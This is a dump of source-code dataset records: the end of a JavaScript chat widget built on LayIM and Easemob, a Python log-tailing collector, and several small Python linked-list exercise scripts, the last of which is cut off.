xxim.presencebox.find('.layim_chatname_' + id).html(chatuseritem.name);\r\n xxim.presencebox.find('.layim_chatface_' + id).attr('src', chatuseritem.face);\r\n }\r\n if (fn) fn(id, chatuseritem);\r\n }, null, { autologin: false, mask: false });\r\n return info\r\n }\r\n };\r\n xxim.showusermsg = function (id, type) {\r\n $(config.chatmsg[id]).each(function (i, item) {\r\n xxim.showmsg($.extend({\r\n time: item.time,\r\n name: item.from,\r\n face: config.user.face,\r\n content: item.data,\r\n type: type,\r\n id: id\r\n }, xxim.getinfo(id)));\r\n layim.easemob.conn.sendReceiptsMessage({ id: item.id });\r\n });\r\n config.chatmsg[id] = [];\r\n }\r\n xxim.showmsg = function (param, type) {\r\n var keys = param.type + param.id;\r\n var h = '<li class=\"' + (type === 'me' ? 'layim_chateme' : '') + '\">'\r\n + '<div class=\"layim_chatuser\">'\r\n + function () {\r\n if (type === 'me') {\r\n //return '<span class=\"layim_chattime\">' + param.time + '</span>'\r\n // + '<span class=\"layim_chatname\">' + param.name + '</span>'\r\n // + '<img src=\"' + param.face + '\" >';\r\n return '<img src=\"' + param.face + '\" >';\r\n } else {\r\n //return '<img src=\"' + param.face + '\" class=\"layim_chatface_' + param.id + '\">'\r\n // + '<span class=\"layim_chatname layim_chatname_' + param.id + '\">' + param.name + '</span>'\r\n // + '<span class=\"layim_chattime\">' + param.time + '</span>';\r\n return '<img src=\"' + param.face + '\" class=\"layim_chatface_' + param.id + '\">';\r\n }\r\n }()\r\n + '</div>'\r\n + '<div class=\"layim_chatsay\">' + param.content + '<em class=\"layim_zero\"></em></div>'\r\n + '</li>';\r\n var imarea = xxim.chatbox.find('#layim_area' + keys);\r\n\r\n var time = param.time ? param.time.substring(0, 16) : '';\r\n if (imarea[0].lasttime != time) {\r\n imarea[0].lasttime = time;\r\n imarea.append('<div class=\"layim_chatarea_time\"><span>' + time + '</span></div>');\r\n }\r\n\r\n imarea.append(h);\r\n imarea.scrollTop(imarea[0].scrollHeight);\r\n };\r\n //弹出聊天窗\r\n xxim.popchatbox = function (othis) {\r\n var node = xxim.node, dataId = othis.attr('data-id'), param = {\r\n id: dataId, //用户ID\r\n type: othis.attr('type'),\r\n name: othis.find('.xxim_onename').text(), //用户名\r\n face: othis.find('.xxim_oneface').attr('src'), //用户头像\r\n href: 'profile.html?user=' + dataId //用户主页\r\n }, key = param.type + dataId;\r\n if (!config.chating[key]) {\r\n xxim.popchat(param);\r\n config.chatings++;\r\n } else {\r\n xxim.tabchat(param);\r\n }\r\n config.chating[key] = param;\r\n\r\n var chatbox = $('#layim_chatbox');\r\n if (chatbox[0]) {\r\n //node.layimMin.hide();\r\n node.layimMin.parent().addClass('xxim_bottom_3');\r\n chatbox.parents('.layui-layerim').show();\r\n }\r\n\r\n };\r\n xxim.setpresence = function (info) {\r\n if (!xxim.presencebox) return;\r\n var hid = 'layim_presencebox_item_' + info.from;\r\n var hitem = xxim.presencebox.find('#' + hid);\r\n if (hitem.length) hitem.remove();\r\n var param = $.extend({ from: info.from }, xxim.getinfo(info.from));\r\n var h = '<div class=\"layim_presencebox_item\" id=\"' + hid + '\"><div class=\"layim_presencebox_item_left\" onclick=\"layim.easemob.xxim.showuserinfo(\\'' + param.from + '\\')\"><img class=\"layim_chatface_' + param.from + '\" src=\"' + param.face + '\"><div class=\"layim_chatname_' + param.from + '\">' + param.name + '</div><div>' + (info.status || '申请加为好友') + '</div></div><div class=\"layim_presencebox_item_right\"><div class=\"layim_presencebox_accept_btn\" onclick=\"layim.easemob.xxim.presenceaccept(\\'' + param.from + '\\')\">接受</div><div class=\"layim_presencebox_reject_btn\" onclick=\"layim.easemob.xxim.presencereject(\\'' + param.from + '\\')\">拒绝</div></div></div>';\r\n xxim.presencebox.find('.layim_presencebox_content').append(h);\r\n };\r\n xxim.presenceaccept = function (id) {\r\n $('#layim_presencebox_item_' + id + ' .layim_presencebox_item_right').html('已接受');\r\n layim.easemob.conn.subscribed({\r\n to: id,\r\n message: \"[resp:true]\"\r\n });\r\n layim.easemob.conn.subscribe({\r\n to: id,\r\n message: \"[resp:true]\"\r\n });\r\n };\r\n xxim.presencereject = function (id) {\r\n $('#layim_presencebox_item_' + id + ' .layim_presencebox_item_right').html('已拒绝');\r\n layim.easemob.conn.unsubscribed({\r\n to: id\r\n });\r\n };\r\n //弹出新的联系人\r\n xxim.poppresencebox = function () {\r\n if (xxim.presencebox) return xxim.settop(xxim.presencebox.parent().parent());\r\n var log = {};\r\n log.success = function (layero) {\r\n xxim.presencebox = layero.find('#layim_presencebox');\r\n xxim.presencebox.find('.layim_presencebox_search_keyword').on('keyup', function (e) {\r\n if (e.which == 13) xxim.searchuser();\r\n });\r\n $(config.presences).each(function (i, item) {\r\n xxim.setpresence(item);\r\n });\r\n config.presences = [];\r\n xxim.showcount();\r\n };\r\n log.html = '<div class=\"layim_presencebox\" id=\"layim_presencebox\">'\r\n + ' <div class=\"layim_presencebox_search\">'\r\n + ' <input class=\"layui-layer-text layim_presencebox_search_keyword\" type=\"text\" placeholder=\"昵称/手机号/邮箱\" />'\r\n + ' <div class=\"layim_presencebox_search_btn\" onclick=\"layim.easemob.xxim.searchuser()\">查找</div>'\r\n + ' </div>'\r\n + ' <div class=\"layim_presencebox_content\">'\r\n + ' </div>'\r\n + '</div>';\r\n layer.open({\r\n type: 1,\r\n title: '新的联系人',\r\n shade: false,\r\n moveType: 1,\r\n skin: 'layui-layerim',\r\n area: ['600px', '400px'],\r\n zIndex: layer.zIndex,\r\n offset: [(($(window).height() - 400) / 2) + 'px', ''],\r\n content: log.html,\r\n cancel: function (index) {\r\n xxim.presencebox = null;\r\n },\r\n success: function (layero) {\r\n log.success(layero);\r\n }\r\n });\r\n };\r\n //请求群员\r\n xxim.getGroups = function (param) {\r\n var keys = param.type + param.id, str = '',\r\n groupss = xxim.chatbox.find('#layim_group' + keys);\r\n groupss.addClass('loading');\r\n config.json(config.api.groups, {}, function (datas) {\r\n if (datas.status === 1) {\r\n var ii = 0, lens = datas.data.length;\r\n if (lens > 0) {\r\n for (; ii < lens; ii++) {\r\n str += '<li data-id=\"' + datas.data[ii].id + '\" type=\"one\"><img src=\"' + datas.data[ii].face + '\" class=\"xxim_oneface\"><span class=\"xxim_onename\">' + datas.data[ii].name + '</span></li>';\r\n }\r\n } else {\r\n str = '<li class=\"layim_errors\">没有群员</li>';\r\n }\r\n\r\n } else {\r\n str = '<li class=\"layim_errors\">' + datas.msg + '</li>';\r\n }\r\n groupss.removeClass('loading');\r\n groupss.html(str);\r\n }, function () {\r\n groupss.removeClass('loading');\r\n groupss.html('<li class=\"layim_errors\">请求异常</li>');\r\n });\r\n };\r\n\r\n //消息传输\r\n xxim.transmit = function () {\r\n var node = xxim.node, log = {};\r\n node.sendbtn = $('#layim_sendbtn');\r\n node.imwrite = $('#layim_write');\r\n //发送\r\n log.send = function () {\r\n var data = {\r\n content: node.imwrite.val(),\r\n id: xxim.nowchat.id,\r\n sign_key: '', //密匙\r\n _: +new Date\r\n };\r\n\r\n if (data.content.replace(/\\s/g, '') === '') {\r\n layer.tips('说点啥呗!', '#layim_write', 2);\r\n node.imwrite.focus();\r\n } else {\r\n var time = xxim.gettime();\r\n layim.easemob.conn.sendTextMessage({ to: data.id, msg: data.content, type: \"chat\", ext: { time: time } });\r\n xxim.showmsg({\r\n id: data.id,\r\n type: xxim.nowchat.type,\r\n time: time,\r\n name: config.user.name,\r\n face: config.user.face,\r\n content: data.content\r\n }, 'me');\r\n node.imwrite.val('').focus();\r\n }\r\n };\r\n node.sendbtn.on('click', log.send);\r\n node.imwrite.keyup(function (e) {\r\n if (e.keyCode === 13) {\r\n log.send();\r\n }\r\n });\r\n };\r\n\r\n //事件\r\n xxim.event = function () {\r\n var node = xxim.node;\r\n //主界面tab\r\n node.tabs.eq(0).addClass('xxim_tabnow');\r\n node.tabs.on('click', function () {\r\n var othis = $(this), index = othis.index();\r\n xxim.tabs(index);\r\n });\r\n //列表展收\r\n node.list.on('click', 'h5', function () {\r\n var othis = $(this), chat = othis.siblings('.xxim_chatlist'), parentss = othis.find(\"i\");\r\n if (parentss.hasClass('fa-caret-down')) {\r\n chat.hide();\r\n parentss.attr('class', 'fa fa-caret-right');\r\n } else {\r\n chat.show();\r\n parentss.attr('class', 'fa fa-caret-down');\r\n }\r\n });\r\n node.online.on('click', function (e) {\r\n if (node.layimMin.parent().hasClass('xxim_bottom_offline')) return;\r\n xxim.tabs(2);\r\n if (xxim.layimNode.attr('state') == '1') xxim.expend();\r\n });\r\n node.xximon.on('click', xxim.expend);\r\n node.xximHide.on('click', xxim.expend);\r\n node.rconnect.on('click', function () {\r\n xxim.rconnect();\r\n });\r\n //搜索\r\n node.xximSearch.keyup(function () {\r\n var val = $(this).val().replace(/\\s/g, '');\r\n if (val !== '') {\r\n node.searchMian.show();\r\n node.closeSearch.show();\r\n //此处的搜索ajax参考xxim.getDates\r\n node.list.eq(3).html('<li class=\"xxim_errormsg\">没有符合条件的结果</li>');\r\n } else {\r\n node.searchMian.hide();\r\n node.closeSearch.hide();\r\n }\r\n });\r\n node.closeSearch.on('click', function () {\r\n $(this).hide();\r\n node.searchMian.hide();\r\n node.xximSearch.val('').focus();\r\n });\r\n //弹出聊天窗\r\n config.chatings = 0;\r\n node.list.on('click', '.xxim_childnode', function () {\r\n var othis = $(this);\r\n xxim.popchatbox(othis);\r\n });\r\n //弹出新的联系人\r\n node.list.on('click', '.xxim_addnode', function () {\r\n xxim.poppresencebox();\r\n });\r\n //点击最小化栏\r\n node.layimMin.on('click', function () {\r\n //$(this).hide();\r\n $(this).parent().addClass('xxim_bottom_3');\r\n $('#layim_chatbox').parents('.layui-layerim').show();\r\n });\r\n //document事件\r\n dom[1].on('click', function () {\r\n node.setonline.hide();\r\n $('#layim_sendtype').hide();\r\n });\r\n };\r\n xxim.gettime = function () {\r\n //var date = new Date();\r\n //var time = date.getHours() + \":\" + date.getMinutes();\r\n //return time;\r\n return new Date().ToFormat('yyyy/MM/dd hh:mm:ss');\r\n //return new Date().toString();\r\n };\r\n xxim.gochat = function () {\r\n var message = xxim.forchat;\r\n if (!message) return;\r\n $.extend(message, { time: xxim.gettime() });\r\n var msg = config.chatmsg[message.from];\r\n if (!msg) {\r\n msg = config.chatmsg[message.from] = [];\r\n var h = '<li data-id=\"' + message.from + '\" class=\"xxim_childnode xxim_childnode_' + message.from + '\" type=\"one\"><img src=\"' + message.face + '\" class=\"xxim_oneface layim_chatface_' + message.from + '\"><span class=\"xxim_onename layim_chatname_' + message.from + '\">' + message.name + '</span><em class=\"xxim_time\">' + (message.time ? message.time.substring(5, 10) : '') + '</em><i class=\"xxim_chatcount xxim_chatcount_' + message.from + '\">1</i></li>';\r\n xxim.node.list.eq(2).find('.xxim_chatlist').prepend(h);\r\n }\r\n var childnodes = xxim.node.list.find('.xxim_childnode_' + message.from);\r\n if (childnodes.length) xxim.popchatbox(childnodes.eq(0));\r\n xxim.forchat = null;\r\n }\r\n xxim.inchat = function (message) {\r\n xxim.forchat = message;\r\n if (layim.easemob.conn.isOpened()) xxim.gochat();\r\n else xxim.rconnect();\r\n };\r\n xxim.showuser = function (list) {\r\n xxim.userlist = list;\r\n var h = '';\r\n h += '<li class=\"xxim_addnode\" id=\"xxim_addnode\"><span class=\"xxim_addnode_face\"><i class=\"fa fa-user\"></i><i class=\"fa fa-plus-circle\"></i></span><span class=\"\">新的联系人</span><i class=\"xxim_chatcount\" style=\"' + (config.presences.length ? 'display:block;' : '') + '\">' + config.presences.length + '</i></li>';\r\n $(list).each(function (i, item) {\r\n if (item.subscription == 'both' || item.subscription == 'to') {\r\n var message = $.extend({ from: item.name }, xxim.getinfo(item.name));\r\n h += '<li data-id=\"' + message.from + '\" class=\"xxim_childnode xxim_childnode_' + message.from + '\" type=\"one\"><img src=\"' + message.face + '\" class=\"xxim_oneface layim_chatface_' + message.from + '\"><span class=\"xxim_onename layim_chatname_' + message.from + '\">' + message.name + '</span><i class=\"xxim_chatcount xxim_chatcount_' + message.from + '\"></i></li>';\r\n }\r\n });\r\n xxim.node.list.eq(0).find('.xxim_chatlist').html(h);\r\n };\r\n xxim.searchuser = function () {\r\n if (!xxim.presencebox) return;\r\n var keyword = xxim.presencebox.find('.layim_presencebox_search_keyword').val();\r\n if (!keyword) return;\r\n common.post('/Api/Shop/ShopMbrBLL/GetMbrChatInfo', { KeyWord: keyword }, function (data) {\r\n if (!data.ResponseContent) return layer.msg('用户不存在!', { zIndex: layer.zIndex });;\r\n xxim.setinfo(data.ResponseContent);\r\n xxim.showuserinfo(data.ResponseContent.MbrID);\r\n });\r\n };\r\n xxim.showpresence = function (e) {\r\n if (e.type === 'subscribe') {\r\n //若e.status中含有[resp:true],则表示为对方同意好友后反向添加自己为好友的消息,demo中发现此类消息,默认同意操作,完成双方互为好友;如果不含有[resp:true],则表示为正常的对方请求添加自己为好友的申请消息。\r\n if (e.status) {\r\n if (e.status.indexOf('resp:true') > -1) {\r\n layim.easemob.conn.subscribed({\r\n to: e.from,\r\n message: \"[resp:true]\"\r\n });\r\n return;\r\n }\r\n }\r\n if (!xxim.presencebox) {\r\n config.presences.push(e);\r\n xxim.showcount();\r\n }\r\n else xxim.setpresence(e);\r\n }\r\n\r\n //(发送者允许接收者接收他们的出席信息),即别人同意你加他为好友\r\n if (e.type === 'subscribed') {\r\n\r\n }\r\n\r\n //unsubscribe(发送者取消订阅另一个实体的出席信息),即删除现有好友\r\n //unsubscribed(订阅者的请求被拒绝或以前的订阅被取消),即对方单向的删除了好友\r\n if (e.type === 'unsubscribe' || e.type === 'unsubscribed') {\r\n layim.easemob.conn.removeRoster({\r\n to: e.from,\r\n groups: ['default'],\r\n success: function () {\r\n layim.easemob.conn.unsubscribed({\r\n to: e.from\r\n });\r\n }\r\n });\r\n }\r\n };\r\n xxim.showhistory = function (message) {\r\n $.extend(message, xxim.getinfo(message.from));\r\n var msg = config.chatmsg[message.from];\r\n if (!msg) {\r\n msg = config.chatmsg[message.from] = [message];\r\n var h = '<li data-id=\"' + message.from + '\" class=\"xxim_childnode xxim_childnode_' + message.from + '\" type=\"one\"><img src=\"' + message.face + '\" class=\"xxim_oneface layim_chatface_' + message.from + '\"><span class=\"xxim_onename layim_chatname_' + message.from + '\">' + message.name + '</span><em class=\"xxim_time\">' + (message.time ? message.time.substring(5, 10) : '') + '</em><i class=\"xxim_chatcount xxim_chatcount_' + message.from + '\"></i></li>';\r\n xxim.node.list.eq(2).find('.xxim_chatlist').prepend(h);\r\n }\r\n else {\r\n msg.push(message);\r\n }\r\n if (xxim.ischating && xxim.nowchat && xxim.nowchat.id == message.from) xxim.showusermsg(message.from, 'one');\r\n xxim.showcount(message.from);\r\n };\r\n xxim.showcount = function (id) {\r\n if (id) {\r\n var msg = config.chatmsg[id];\r\n if (!msg) return;\r\n var $chatcount = xxim.node.list.find('.xxim_chatcount_' + id);\r\n if (msg.length) $chatcount.html(msg.length).show();\r\n else $chatcount.hide().html(msg.length);\r\n }\r\n var pcount = config.presences ? config.presences.length : 0;\r\n if (pcount) xxim.node.list.find('#xxim_addnode .xxim_chatcount').html(pcount).show();\r\n else xxim.node.list.find('#xxim_addnode .xxim_chatcount').html(pcount).hide();\r\n var count = pcount;\r\n for (var i in config.chatmsg) {\r\n count += config.chatmsg[i].length;\r\n }\r\n var $count = xxim.node.online.children('.xxim_chatcount');\r\n if (layim.easemob.showtip) layim.easemob.showtip(count);\r\n else {\r\n if (count) $count.html(count);\r\n else $count.html('');\r\n }\r\n };\r\n //渲染骨架\r\n xxim.view = (function () {\r\n var xximNode = xxim.layimNode = $('<div id=\"xximmm\" class=\"xxim_main\">'\r\n + '<div class=\"xxim_top\" id=\"xxim_top\">'\r\n + ' <div class=\"xxim_search\"><i class=\"fa fa-search\"></i><input id=\"xxim_searchkey\" /><span id=\"xxim_closesearch\">×</span></div>'\r\n + ' <div class=\"xxim_tabs\" id=\"xxim_tabs\"><span class=\"xxim_tabfriend\" title=\"好友\"><i class=\"fa fa-user\"></i></span><span class=\"xxim_tabgroup\" title=\"群组\"><i class=\"fa fa-users\"></i></span><span class=\"xxim_latechat\" title=\"最近聊天\"><i class=\"fa fa-clock-o\"></i></span></div>'\r\n + ' <ul class=\"xxim_list loading\"><li class=\"xxim_liston\"><ul class=\"xxim_chatlist\"></ul></li></ul>'\r\n + ' <ul class=\"xxim_list loading\"></ul>'\r\n + ' <ul class=\"xxim_list loading\"><li class=\"xxim_liston\"><ul class=\"xxim_chatlist\"></ul></li></ul>'\r\n + ' <ul class=\"xxim_list xxim_searchmain\" id=\"xxim_searchmain\"></ul>'\r\n + '</div>'\r\n + '<ul class=\"xxim_bottom xxim_bottom_3 xxim_bottom_offline\" id=\"xxim_bottom\">'\r\n + '<li class=\"xxim_online xxim_offline\" id=\"xxim_online\" title=\"状态\">'\r\n + '<i class=\"xxim_chatcount\"></i><span id=\"xxim_onlinetex\">离线</span>'\r\n + '</li>'\r\n + '<li class=\"xxim_mymsg\" id=\"xxim_mymsg\" title=\"对话窗口\"><i class=\"fa fa-comments\"></i></li>'\r\n + '<li class=\"xxim_seter\" id=\"xxim_seter\" title=\"设置\">'\r\n + '<i class=\"fa fa-gear\"></i>'\r\n + '<div>'\r\n\r\n + '</div>'\r\n + '</li>'\r\n + '<li class=\"xxim_rconnect loading\" id=\"xxim_rconnect\"></li>'\r\n + '<li class=\"xxim_hide\" id=\"xxim_hide\" title=\"显示/隐藏面板\"><i class=\"fa fa-exchange\"></i></li>'\r\n + '</ul>'\r\n + '</div>');\r\n dom[3].append(xximNode);\r\n\r\n xxim.renode();\r\n xxim.event();\r\n xxim.layinit();\r\n }());\r\n}"
},
{
"alpha_fraction": 0.5485029816627502,
"alphanum_fraction": 0.5646706819534302,
"avg_line_length": 27.775861740112305,
"blob_id": "64e496160bbe218ea2ed7f3ce5e8987f6b72363c",
"content_id": "7d7705780c6a4d9ef8b47dc1c785c5adf2406c6b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1828,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 58,
"path": "/terminal/getterminalfield.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n1、读取文件\n2、正则表达式提取信息\n3、生成字段插入数据库\ncreate by swm\n2018/1/15\n\"\"\"\nimport os\nimport re\nimport time\nimport datetime\n\nfrom terminal.allconfig import conf\nfrom terminal.mongooptions import insertintoterminal\n\nclass ANALYSIS:\n\n def getallthefilename(self, directorypath):\n allfilenames = []\n for root, dirs, files in os.walk(directorypath):\n for filename in files:\n # print(filename)\n allfilenames.append(filename)\n return allfilenames\n\n # 跟踪文件,定位为文件最后一行\n def follw(self, thefile):\n thefile.seek(0, 2) # Go to the end of the file\n while True:\n line = thefile.readline()\n if not line:\n time.sleep(0.1)\n continue\n yield line\n\n def storeinformation(self, infotime):\n # 创建字典暂存信息\n info = {}\n info['logtime'] = infotime\n insertintoterminal(info)\n\n def startcollectinformation(self):\n # 信号强度\n # 数据包\n # 匹配当前时间\n re_time = re.compile(r'(\\S{3}) (\\d{2})\\, (\\d{4}) (\\d{2})\\:(\\d{2})\\:(\\d{2})')\n logfile = open(conf['terminal'], \"r\")\n loglines = self.follw(logfile)\n for line in loglines:\n logtime = re_time.match(line)\n # datetime\n origintime = datetime.datetime(int(logtime.group(3)), conf[logtime.group(1)], int(logtime.group(2)), int(logtime.group(4)),\n int(logtime.group(5)), int(logtime.group(6)))\n # 存入数据库采用unix time的整形\n unixtime = int(time.mktime(origintime.timetuple()))\n # 最后调用存储的方法\n self.storeinformation(unixtime)\n\n"
}
] | 41 |
ANKITPODDER2000/LinkedList | https://github.com/ANKITPODDER2000/LinkedList | e9e22b7dff42d5633aa473edae2d1a3386d2650e | 06077454aecf59937fe028caf814443c617d83f7 | d4be7e60a2ce8bbcdd9f9fa2b05f15410e5c8003 | refs/heads/main | 2023-02-17T06:15:12.230477 | 2021-01-10T13:44:06 | 2021-01-10T13:44:06 | 328,392,805 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5343137383460999,
"alphanum_fraction": 0.5571895241737366,
"avg_line_length": 20.10344886779785,
"blob_id": "20ea06084ab3b81f394b88a20fd22dc59475dfea",
"content_id": "cf22bbbd538c18dcee0464696e332aa6a3276a62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 612,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 29,
"path": "/43_linked_list_rotate.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef rotate(l1 , k):\n k = k % l1.length()\n head = l1.head\n if k == 0:\n return\n c = 1\n temp_head = head\n while c<k:\n head = head.next\n c += 1\n temp = head.next\n temp1 = temp\n while temp.next:\n temp = temp.next\n head.next = temp.next\n temp.next = temp_head\n l1.head = temp1\n\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n k = int(input(\"Enter the value of k : \"))\n l1.display()\n rotate(l1 , k)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.600382387638092,
"alphanum_fraction": 0.609942615032196,
"avg_line_length": 28.05555534362793,
"blob_id": "981562e2bca308518c0af9200ae94a74e9a0d994",
"content_id": "7069a23876a5244786c8a1f46fb5d8d73276003e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 523,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 18,
"path": "/12_loop_detection.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\nclass LinkedListMod(LinkedList):\n def detect_loop(self):\n HASH = {}\n temp = self.head\n while temp and temp not in HASH:\n HASH[temp] = True\n temp = temp.next\n return not temp==None\ndef main():\n l1 = LinkedListMod()\n CreateLinkedList(l1)\n tail = l1.get_tail()\n tail.next = l1.head.next.next\n print(\"Is their any loop : \",l1.detect_loop())\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5394737124443054,
"alphanum_fraction": 0.5582706928253174,
"avg_line_length": 21.16666603088379,
"blob_id": "9b8abb751b0e816d3d9048b203c82ea43b9e363a",
"content_id": "78fb22f3574ccd5b02dc12d0436d1bbadccfe4f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 532,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 24,
"path": "/35_middle_to_head.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef middle_to_head(head):\n prev = None\n mid = head\n temp_head = head\n c = 0\n while head:\n if c & 1 == 1:\n prev = mid\n mid = mid.next\n head = head.next\n c += 1\n prev.next = mid.next\n mid.next = temp_head\n return mid\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n l1.display()\n l1.head = middle_to_head(l1.head)\n l1.display()\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5799086689949036,
"alphanum_fraction": 0.5913242101669312,
"avg_line_length": 26.4375,
"blob_id": "d374169f2f22d64196612ad1f93648db9345a983",
"content_id": "dea2879769eb32797e35cdc3794443ca9e9d96a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 16,
"path": "/26_occurence.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef count(head , num):\n c = 0\n while head:\n if head.val == num:\n c += 1\n head = head.next\n return c\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n num = int(input(\"Enter the number : \"))\n print(\"Occurence of %d in the linkedlist is = %d\"%(num , count(l1.head , num)))\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.6482758522033691,
"alphanum_fraction": 0.6724137663841248,
"avg_line_length": 28.100000381469727,
"blob_id": "a43385002091dfd8a306c83a1340ff9df67faea4",
"content_id": "3781f6de6cba1409ffe44031f8d30e1278c18c8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 290,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 10,
"path": "/27_lengthisEven.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef evenLength(l1):\n return (l1.length() % 2) == 0\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1)\n print(\"Length of linkedlist is even : \",evenLength(l1))\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.5481651425361633,
"alphanum_fraction": 0.5779816508293152,
"avg_line_length": 23.27777862548828,
"blob_id": "93f11e5bf8b2e45c19c4aada9597aa90e2cdd029",
"content_id": "7de4ad4694ec0141d0e86a5a8f40c2142dc6d9c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 436,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 18,
"path": "/5_is_there_circle.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedListHelper import CreateLinkedList\ndef _isCircular(l1):\n head = l1\n l1 = l1.next\n while l1!=None and l1!=head:\n l1 = l1.next\n return l1==head\ndef main():\n l1 = CreateLinkedList()\n # temp = l1.head\n # while temp.next != None:\n # temp = temp.next\n # temp.next = l1.head\n print(\"Is there any circle in linked list : \",_isCircular(l1.head))\n \n \nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.4937500059604645,
"alphanum_fraction": 0.5406249761581421,
"avg_line_length": 21.85714340209961,
"blob_id": "8afb1d9d4b935c86991c1d160ec74c91bab5bc49",
"content_id": "e5a5504fc7ae950c928233c1bd47cefa26e500cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 640,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 28,
"path": "/42_num_mul.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef multiply(l1 , l2):\n LEN = l1.length() - 1\n num1 = 0\n head = l1.head\n while head:\n num1 = num1 + (head.val*(10 ** LEN))\n LEN -= 1\n head = head.next\n \n LEN = l2.length() - 1\n num2 = 0\n head = l2.head\n while head:\n num2 = num2 + (head.val*(10 ** LEN))\n LEN -= 1\n head = head.next\n return num1 * num2\n \ndef main():\n l1 = LinkedList()\n l2 = LinkedList()\n CreateLinkedList(l1)\n CreateLinkedList(l2)\n print(\"Mul : \",multiply(l1 , l2))\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5450381636619568,
"alphanum_fraction": 0.5847328305244446,
"avg_line_length": 26.29166603088379,
"blob_id": "90af7aa8b14876659d444325adc52527c87bbc50",
"content_id": "9c455483128d1c708c558e0e043b20d7481d10eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 24,
"path": "/24_compare_string.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "from LinkedList import LinkedList\nfrom LinkedListHelper import CreateLinkedList\ndef compare(head1 , head2):\n while head1 and head2:\n if head1.val == head2.val:\n head1 = head1.next\n head2 = head2.next\n elif head1.val > head2.val:\n return 1\n else:\n return -1\n if not head1 and not head2:\n return 0\n elif head1:\n return 1\n return -1\ndef main():\n l1 = LinkedList()\n CreateLinkedList(l1 , func=str)\n l2 = LinkedList()\n CreateLinkedList(l2 , func=str)\n print(\"Ans of comparision is = %d\"%compare(l1.head , l2.head))\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.44176429510116577,
"alphanum_fraction": 0.4562370777130127,
"avg_line_length": 24.017240524291992,
"blob_id": "95ebeb07760dcba593cc8fb0a616fbebfa5432e1",
"content_id": "b0bc87f3eb4f13b763ecb0ead9639e31b0a4dd36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1451,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 58,
"path": "/1_add_1_num.py",
"repo_name": "ANKITPODDER2000/LinkedList",
"src_encoding": "UTF-8",
"text": "class Node:\n def __init__(self , val = 0 , next = None):\n self.val = val\n self.next = next\nclass LinkedList:\n def __init__(self):\n self.head = None\n def inset_end(self , val = 0):\n if not self.head:\n self.head = Node(val=val)\n else:\n temp = self.head\n while temp.next:\n temp = temp.next\n temp.next = Node(val=val)\n def display(self):\n if not self.head:\n print(\"Linked list is empty!\")\n return\n temp = self.head\n print(\"Linked list is\",end=\"\")\n while temp:\n print(\" -> \"+str(temp.val),end=\"\")\n temp = temp.next\n def reverse(self):\n temp = self.head\n prev = None\n while temp:\n nxt = temp.next\n temp.next = prev\n prev = temp\n temp = nxt\n self.head = prev\n def get_num(self):\n temp = self.head\n num = 0\n i = 0\n while temp:\n num += ((10**i) * temp.val)\n temp = temp.next\n i+=1\n return num\ndef main():\n num = input(\"Enter the number : \")\n l1 = LinkedList()\n for i in num:\n l1.inset_end(int(i))\n l1.reverse()\n num = l1.get_num() + 1\n l2 = LinkedList()\n while num != 0:\n l2.inset_end(num%10)\n num //= 10\n 